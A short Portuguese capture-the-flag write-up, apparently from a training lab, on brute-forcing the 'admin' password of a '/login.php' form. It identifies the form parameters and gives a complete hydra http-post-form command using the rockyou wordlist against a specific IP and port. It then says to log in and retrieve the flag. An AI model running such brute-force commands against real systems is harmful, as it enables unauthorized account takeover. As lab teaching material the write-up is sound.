Question-1
Usando o que você aprendeu nesta seção, tente atacar a página '/login.php' para identificar a senha do usuário 'admin'. Depois de fazer login, você deverá encontrar uma bandeira. Envie a bandeira como resposta.
Formulário de login
Encontrar os paramêtros do formulário de login
Em seguida vamos procurar por parametros que compõem o login
username=admin&password=adminPara usar em um
hydra http-post-form, podemos tomá-lo como está e substituir o nome de usuário/senha que usamosadmin:adminpor^USER^e^PASS^. A especificação do nosso caminho de destino final deve ser a seguinte:
"/login.php:username=^USER^&password=^PASS^:F=<form name='login'"Pyload :
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 94.237.59.199 -s 56528 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"
Fazer o login com as credenciais encontradas e achar a flag
Last updated